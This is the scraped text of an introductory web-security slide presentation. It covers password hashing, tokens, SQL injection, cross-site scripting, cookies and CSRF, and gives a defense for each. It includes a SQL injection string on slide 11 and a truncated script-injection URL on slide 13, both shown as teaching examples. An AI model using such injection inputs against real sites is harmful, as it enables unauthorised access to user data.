Its worth a shot. https://youtu.be/7W5au-IJUEc Approach 1. What - - PowerPoint PPT Presentation

it s worth a shot
SMART_READER_LITE
LIVE PREVIEW

Its worth a shot. https://youtu.be/7W5au-IJUEc Approach 1. What - - PowerPoint PPT Presentation

Apr 30, 2023 9 likes •200 views

Its worth a shot. https://youtu.be/7W5au-IJUEc Approach 1. What created the vulnerability. 2. How the vulnerability is exploited. 3. How to protect yourself. Web 2.0 What could possibly go wrong?! Servers send HTML and JS to clients

slide-1
SLIDE 1

It’s worth a shot.

https://youtu.be/7W5au-IJUEc

slide-2
SLIDE 2

Approach

1. What created the vulnerability. 2. How the vulnerability is exploited. 3. How to protect yourself.

slide-3
SLIDE 3

Web 2.0

  • Servers send HTML and JS to clients
  • Clients execute JS that changes the

DOM and makes requests back to the server

What could possibly go wrong?!

Server HTML, CSS, JS Bingo

slide-4
SLIDE 4

Authentication

  • Usually requires a username and password
  • What kinds of passwords are acceptable?
  • How should we send the username and password?
  • How should we store and validate the username and password?

Username and password… easy.

slide-5
SLIDE 5

Authentication

  • Don’t store passwords in plaintext
  • Hash!
slide-6
SLIDE 6

Authentication

Password Storage

salt+hash Hash function password random salt hash

slide-7
SLIDE 7

Authentication

Password Validation

salt+hash Hash function password match? salt hash hash to check Are hashed passwords uncrackable? No!

slide-8
SLIDE 8

Authentication

  • We’re hashing passwords, so do we need encryption?
  • We sure do!

Encryption

Server Bingo HTTP POST username, password salt+hash Bongo Thanks!

slide-9
SLIDE 9

Authentication

  • We don’t want people to have to constantly log in
  • We need to give the client a token that they can use to prove

that they have authenticated successfully

Tokens

Server Bingo HTTPS POST username, password token

slide-10
SLIDE 10

Authentication

  • Must identify the user
  • Must be signed with the server’s private key

Tokens

Server Bingo token OK Bongo fake token nope

slide-11
SLIDE 11

SQL Injection

  • What happens when name is “ or “” = “
slide-12
SLIDE 12

SQL Injection

Solving the problem.

  • Blacklist certain characters
  • Whitelist certain characters
  • Use prepared statements
slide-13
SLIDE 13

Cross-site Scripting (XSS)

  • Stored XSS
  • Reflected XSS

Just stick to the script.

www.bongo.com

Check this out! www.bank.com/profile?name=<script>...

slide-14
SLIDE 14

Cross-site Scripting (XSS)

  • Sanitize inputs
  • Escape HTML
  • Use auto-escaping framework like React or Vue.js

Protection.

slide-15
SLIDE 15

Cookies

  • HTTP is stateless
  • Cookies are used to maintain state

○ Store session information ○ Store user preferences ○ Track your every move...

Just maintain state! No problem!

slide-16
SLIDE 16

Cross-site Request Forgery (CSRF)

It really wasn’t me this time.

  • Your browser automatically attaches cookies to requests to the

domain they came from

slide-17
SLIDE 17

Server Bingo transfer <cookie> OK

www.bongo.com

GET www.bongo.com malicious content

Cross-site Request Forgery (CSRF)

slide-18
SLIDE 18
  • Don’t use GET to modify state
  • Hidden nonces in forms
  • Use Samesite cookies
  • Check the origin or referer of the request

Prevention.

Cross-site Request Forgery (CSRF)

slide-19
SLIDE 19

Honorable Mentions

  • Containers
  • Metasploit (penetration testing): www.metasploit.com
  • OWASP (web application security): www.owasp.org
  • WebGoat: github.com/WebGoat/WebGoat